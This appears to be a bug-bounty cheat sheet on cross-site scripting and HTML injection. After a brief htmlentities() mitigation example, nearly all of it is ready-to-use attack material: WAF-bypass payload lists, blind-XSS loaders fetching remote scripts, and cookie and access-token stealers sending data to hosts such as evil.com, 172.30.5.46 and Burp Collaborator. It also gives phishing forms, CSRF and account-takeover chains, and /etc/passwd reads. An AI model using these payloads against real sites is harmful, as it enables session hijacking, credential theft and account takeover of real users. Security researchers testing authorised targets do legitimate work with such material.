XSS-HTML Injection
In the name of God, the Most Gracious, the Most Merciful
What's XSS
XSS, or Cross-Site Scripting, is like a digital illusionist's trick on the web. It occurs when a malicious script is injected into a website, turning it into a stage for hackers. Imagine innocent user input as a Trojan horse, bringing in a hidden script that dances through the site, stealing sensitive information like a phantom in the digital shadows. XSS exploits the trust between websites and users, turning the virtual playground into a stage for unseen mischief. Guarding against this vulnerability is like installing a cybersecurity force field, protecting the online theater from unwanted script-kiddie performances.
Example For Vulnerable code
<!DOCTYPE html>
<html>
<body>
<?php
$txt = "PHP";
echo "I love $txt!";
?>
</body>
</html>Mitigation code
Use htmlentities() Function
<!DOCTYPE html> <html> <body> <?php $txt = '"><script>alert(0)</script>'; echo htmlentities("I love $txt!"); ?> </body> </html>Examples for htmlentities()
<?php $str = "A 'quote' is <b>bold</b>"; // Outputs: A 'quote' is <b>bold</b> echo htmlentities($str); // Outputs: A 'quote' is <b>bold</b> echo htmlentities($str, ENT_QUOTES); ?>
XSS & HTMLI Testing Methodology
Basic Schema
<tag handler=code>Advanced Final Schema Try to make you Payloads inspired by this schema this will help you to bypass filters/Bypasses
extra1<tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3
#XSS vs WAF
1) use <x & jump to event handler
2) use onxxx=yyy & find number of x it accepts
3) test them & change tag accordingly
4) put js1) Find a reflection point
use gau/waymore to grab all urls and pass them to kxss tool to test reflection
echo "domain.com" | gau | kxss | grep ">"Do some Google or any seach engines dorking to find endpoints
ext:php | ext:asp | ext:aspx | ext:jsp | ext:asp | ext:pl | ext:cfm | ext:py | ext:rb | ext:.htmlNavigate to website and try every single function and features with burp/ZAP logging the requests Testing every parameter for relection using Extenstions like "Reflector" or "Reflect"
FUZZING parameters using "Param-Miner" and "Arjun and test their reflection
2) Get HTML injection
Payloads
88<h1>POC for h0tak88r</h1>88
%253Ch1%253EHTML%253C%252Fh1%253E
<iframe id="if1" src="https://www.google.com"></iframe>
&lt;h1&gt;HTML&lt;/h1&gt;
<h1>HTML</h1>
---------
<form method="GET">Username: <input type="text" name="username" value="" /> <br />Password: <input type="password" name="passwd" value="" /> <br /><input type="submit" name="submit" value="login" /></form>
------------------
<h1>!!</h1><br/><h2><p style=\"color:red;\">there is a new discount code of 80%. Take advantage of it now!</p><form action=\"https://url/\"><button type=\"submit\">Click Here</button></h2>Open Redirect
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<meta http-equiv="refresh" content="0; url=http://h0tak88r.github.io" />Setting a Cookie
<meta http-equiv="Set-Cookie" Content="SESSID=1"><portal src='https://attacker-server? <html>
<body>
<span style="display: block; float: left;">Copy me<br> </span>
<span style="display: block; float: left; background: transparent; color: transparent; white-space: no-wrap; overflow: hidden; width: 0px; height: 0px;"> ; *Your Command/Payload Here* </span>
<span style="display: block; float: left;">
</span>
<span style="display: block; white-space: no-wrap;"> </span>
<span style="display: block; clear: both;"></span>
</body>
</html>Stealing clear text secrets
<img src='http://attacker.com/log.php?HTML= <meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text= <meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=Abuse CSS
<style>@import//hackvertor.co.uk?
<table background='//your-collaborator-id.burpcollaborator.net?'Stealing Forms Set a form header:
<form action='http://evil.com/log_steal'>this will overwrite the next form header and all the data from the form will be sent to the attacker
<button name=xss type=submit formaction='https://google.com'>I get consumed!
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><optionusing noscript
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>3) Get your event handler injected
"When building XSS payloads, some javascript event handlers can be used regardless of the tag used and work on the 5 major browsers until date (Chrome, Firefox, IE/Edge, Safari and Opera) hence the term “agnostic”"
<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000Brute Force Event Handlers
onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforecopy
onbeforecut
onbeforeinput
onbeforeprint
onbeforescriptexecute
onbeforetoggle
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncuechange
oncut
ondblclick
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
ondurationchange
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel
onmozfullscreenchange
onpagehide
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onprogress
onratechange
onrepeat
onreset
onresize
onscroll
onscrollend
onsearch
onseeked
onseeking
onselect
onselectionchange
onselectstart
onshow
onstart
onsubmit
ontimeupdate
ontoggle
ontoggle(popover)
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
ontransitionstart
onunhandledrejection
onunload
onvolumechange
onwebkitanimationend
onwebkitanimationiteration
onwebkitanimationstart
onwebkittransitionend
onwheel# href
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
----------------------------------------
# Action
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
-----------------------
# formaction
**<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click>
---------------------------
# data
**<object data=javascript:alert(1)>
---------------------------------------------
# srcdoc
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
----------------------------------------------------
# xlink:href
<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
-------------------------------------------------
# from
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
-------------------------------------------------4) Inject JS code
h0tak88r XSS
"'-->aaaaa<h1 onclick=alert(1)>h0tak88r
"'--><h1 onmouseover="alert(88)" style="color: red;">h0tak88r</h1>
"'--><input/onauxclick="[1].map(prompt)">
'"()&%<zzz><ScRiPt >alert('88')</ScRiPt>&
<img src=x onerror=eval(atob('YWxlcnQoJ0kgb25seSB3cml0ZSBsYW1lIFBvQ3MnKQ==')) />
'"--><Body onbeforescriptexecute="[1].map(confirm)">
''"--><img src=x onODYSsyi=1 onerror=alert(document.cookie)>
'`><\x00img src=xxx:x onerror=javascript:alert(1)>
"><button popovertarget=x>Click me</button> <input type="hidden" value="y" popover id=x onbeforetoggle=alert(document.cookie)>
script><svg/onload=prompt`{document.cookie}`>Blind XSS Get your blind XSS payloads from https://xss.report/ OR https://xsshunter.trufflesecurity.com/app/#/
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL004U1pUOCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
'"><script src=//xss.report/s/M8SZT8></script>
"><script src="https://js.rip/l5j9hbki0b"></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL2w1ajloYmtpMGIiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>Payload list
# karem Payloads
'"><script>alert('karem')</script>
'"><img src=1 onerror="alert('Karem')">
'"><img src=1 onkarem=1 onerror="alert('Karem')">
<script/src=//6a%2elv></script>
'"></script><script>alert(document.cookie)</script>
%27"accesskey="x" onclick="alert(document.cookie)" x="
"><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS
<details/open=/open/href=/data=;+ontoggle="(alert)(document.cookie)>
"><iframe/src=javascript:alert%26%23x000000028%3b)>
%22%3E%3Ciframe/src%3Djavascript%3Aalert%2526%2523x000000028%253b%29%3E%0A
<svg onload=prompt%26%230000000040document.domain)>
"'--<h1 onmouseover="alert('karem')" style="color: red;">karem</h1>
"><button%20popovertarget=x>Click%20me</button>%20<input%20type="hidden"%20value="y"%20popover%20id=x%20onbeforetoggle=alert(document.cookie)>
"><a href="javascript:alert('xss')">clickme</a>
<svg onload=prompt%26%230000000040document.domain)>
'"><script>alert('karem')</script>@gmail.com
%0Dalert`1`//
"<script>alert</script>"@gmail.com
"><img src=1 OnErRoR=alert('xss')>
'"><script src=https://xss.report/c/karemelsqary74></script>
"><svg/onload=alert.bind()(document.domain)>
'`><\x00img src=xxx:x onerror=javascript:alert(1)>
'"><<Svg/Only=1/OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
# h0tak88r
<style>*{background-image:url('\\\\6A\\\\61\\\\76\\\\61\\\\73\\\\63\\\\72\\\\69\\\\70\\\\74\\\\3A\\\\61\\\\6C\\\\65\\\\72\\\\74\\\\28\\\\6C\\\\6F\\\\63\\\\61\\\\74\\\\69\\\\6F\\\\6E\\\\29')}</style>
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
"><input/onauxclick="[1].map(prompt)">
<img src=x onerror=eval(atob('YWxlcnQoJ0kgb25seSB3cml0ZSBsYW1lIFBvQ3MnKQ==')) />
'"--><Body onbeforescriptexecute="[1].map(confirm)">
'-prompt.call(window, 'xss')-'
<svg+onload=innerHTML=URL,outerHTML=textContent>#<img/src/onerror=alert(domain)>
<img src=x onVector=X-Vector onerror=alert(1)>
%2sscript%2ualert()%2s/script%2u
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
toString=\\\\u0061lert;window+' '
"'-->aaaaa<h1 onclick=alert(1)>test
<noscript><p title="</noscript><img src=x onerror=alert(document.domain)>">
" onfocus="alert(1)" autofocus="
''"--><img src=x onODYSsyi=1 onerror=alert(document.cookie)>
"'--><img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
# XSS in Markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
# XSS in SVG (short)
<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
# Bypass word blacklist with code evaluation
eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;
# Data grabber for XSS
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
# Quick Defense:
<input type="search" onsearch="aler\\\\u0074(1)">
<details ontoggle="aler\\\\u0074(1)">
# IMG_error
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\\x2561lert(1)'" src="x">
<img onerror="location='javascript:\\x255Cu0061lert(1)'" src="x" >
# Unicode + HTML
<svg><script>\u0061\u006c\u0065\u0072\u0074(1)</script></svg>
# URL
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
# Hex
<script>eval('\\\\x61lert(1)')</script>
# Only lowercase block
<sCRipT>alert(1)</sCRipT>
# Break regex
<script>%0aalert(1)</script>
# Recursive filters
<scr<script>ipt>alert(1)</scr</script>ipt>
# Inject anchor tag
<a/href="j	a	v	asc	ri	pt:alert(1)">
# Bypass whitespaces
<svg·onload=alert(1)>
# Brutelogic
\\'-alert(1)//
</script><svg onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
# Imperva Incapsula
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
<img/src="x"/onerror="[JS-F**K Payload]">
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';><img/src=q onerror='new Function`al\\\\ert\\\\`1\\\\``'>
# WebKnight
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
# F5 Big IP
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="[JS-F**k Payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
# PHP-IDS
<svg+onload=+"[DATA]"
<svg+onload=+"aler%25%37%34(1)"
# Mod-Security
<a href="j[785 bytes of (
	)]avascript:alert(1);">XSS</a>
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
# Sucuri WAF
1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
# Akamai
1%3C/script%3E%3Csvg/onload=prompt(document[domain])%3E
<SCr%00Ipt>confirm(1)</scR%00ipt>
# AngularJS
{{constructor.constructor(alert 1 )()}}
#html Sanitization Bypass
<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
# Bypass ‘ ‘ ( )
<iframe/src=javascript:alert%26%23x000000028%3b%27hacked%27)>
# waf Bypass SVG
<svg><a xlink:href=?usemap=/*&#x61;lert(1)*/onmouseover=window.focus()//>Hover me</a></svg>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
# XSS in email Section
admin1@example.com<script>alert('xss');</script>
“><svg/onload=confirm(1)>”@x.y
"hello<form/><!><details/open/ontoggle=alert(1)>"@gmail.com
["');alert('XSS');//"]@xyz.xxx
"<svg/onload=alert(1)>"@gmail.com
test@gmail.com%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E
# XSS Bypass for Rich Text Editors
<</p>iframe src=javascript:alert()//
<a href="aaa:bbb">x</a>
<a href="j%26Tab%3bavascript%26colon%3ba%26Tab%3blert()">x</a>
[Click on me to claim 100$ vouchers](<https://evil.com>) -> Hyperlink Injection
# XSS Reflected in JSON Format and “{}” Forbidden
test%2Aconsole.log(1337)//’;
# XSS Reflected in `<link>` OR `<input type=hidden>` attribute when add param
/?lol=h0tak88r’accesskey=’x’onclick=’alert(0)’ # But the Victim must click ALT+SHIFT+X
# [Jhaddix](https://github.com/R0X4R/D4rkXSS/blob/master/jhaddix.txt)
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<<scr\\0ipt/src=http://xss.com/xss.js></script%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)
# [RSnake](https://github.com/R0X4R/D4rkXSS/blob/master/rsnake.txt)
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
# [Mario](https://github.com/R0X4R/D4rkXSS/blob/master/mario.txt)
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>
# Blind Xss
'"><script src=//xss.report/s/M8SZT8></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8veHNzLnJlcG9ydC9zL004U1pUOCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
# Using Burp Collaborator
<https://medium.com/@jr.mayank1999/exploiting-blind-xss-with-burp-collaborator-client-fec38b5fc5e>polyglots
jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="<http://i.imgur.com/P8mL8.jpg>">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()///</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*XSS Exploitation
Self XSS + CORS = ATO
https://notifybugme.medium.com/chaining-cors-by-reflected-xss-to-account-takeover-my-first-blog-5b4f12b43c70
1. Got self XSS ?
2. cat corstexturl.txt | CorsMe or cat corstexturl.txt | soru -u | anew |while read host do ; do curl -s — path-as-is — insecure -H “Origin: test.com” “$host” | grep -qs “Access-control-allow-origin: test.com” && echo “$host \\033[0;31m” cors Vulnerable;done
3. So to exploit this CORS Misconfiguration we just need to replace the XSS payload alert(document.domain), with the following code:
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.status == 200) {
alert(this.responseText);
document.getElementById("demo").innerHTML = this.responseText;
}
};
xhttp.open("GET", "<https://www.attacker.com/api/account>", true);
xhttp.withCredentials = true;
xhttp.send();
}
cors();
4. So here is the final POC
https://test.attacker.com/patter.jsp?facct="><script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","https://www.attacker.com/api/account",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>Self XSS to ATO
## convert self xss to reflected one
copy response in a file.html -> it will workXSS to ATO
<script>
fetch('<https://BURP-COLLABORATOR-SUBDOMAIN>', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>## Cookie stealing through xss
<https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py>
<https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md>
<script>var i=newImage;i.src="http://172.30.5.46:8888/?"+document.cookie;</script>
<img src=x onerror=this.src='<http://172.30.5.46:8888/?'+document.cookie;>>
<img src=x onerror="this.src='<http://172.30.5.46:8888/?'+document.cookie>; this.removeAttribute('onerror');">XSS to RCE
XSS to LFI
<script%00>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script%00>
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send();</script>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>XSS to SSRF
<esi:include src="<http://yoursite.com/capture>" />XSS to CSRF
POC :
https://vulnerable.site/profile.php?msg=<script src=’https://attacker.site/attacker/script.js’></script>
var csrfProtectedPage ='<https://vulnerable.site/profile.php>'
var csrfProtectedForm ='form'
//get valid token for current request
var html = get(csrfProtectedPage);
document.getElementbyId(csrfProtectedForm);
var token = form.token.value;
//Build with valid token
document.body.innerHTML+='form id="myform"action="+csrfProtectedPage+"method="POST">'+'<input id="password"name="name"value="hacked">'+'</form>';
// Auto submit form
document.forms["myfor"].submit();
function get(url){
var xmlHttp = new XMLHttpRequest();
xamlHttp.open("GET", url.false);
xmlHttp.send(null)
return xmlHttp.responseText;
}<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>XSS Via Header Injection
hostheader: bing.com">script>alert(document.domain)</script><"XSS to Open Redirect
## URL redirection through xss
document.location.href="<http://evil.com>"Phishing Via Iframe
## phishing through xss - iframe injection
<iframe src="http://evil.com" height="100" width="100"></iframe>Remote File Inclusion (RFI) to XSS
php?=http://brutelogic.com.br/poc.svgFile upload To XSS
file upload name XSS
upload a picture file, intercept it, change picturename.jpg to xss payloadXSS via SVG file
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("h0tak88r XSS");
</script>
</svg>DOM XSS
Check for Dom-XSS in Swagger-UI
configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
Example for Vulnerable Code
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
</script>Exploit
<iframe src="<https://target.com/>" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">Some Bypasses Techniques
XSS for
.JSONendpoint [ bypass (.html)andWAF]“resource Type” : “silent:nonexitsting”FunctionUse
url-encodedpayload with .htmextension and//for break directory block too , So the server so the server didn’t understand my request fullyPOC:
https://www.redacted.com/etc/designs/redacted.json//%3Csvg%20onload=alert(document.domain)%3E.html
XSS in meta tag
Top XSS reports from HackerOne:
Cross Site Scripting (XSS) Write_ups
Last updated
Was this helpful?
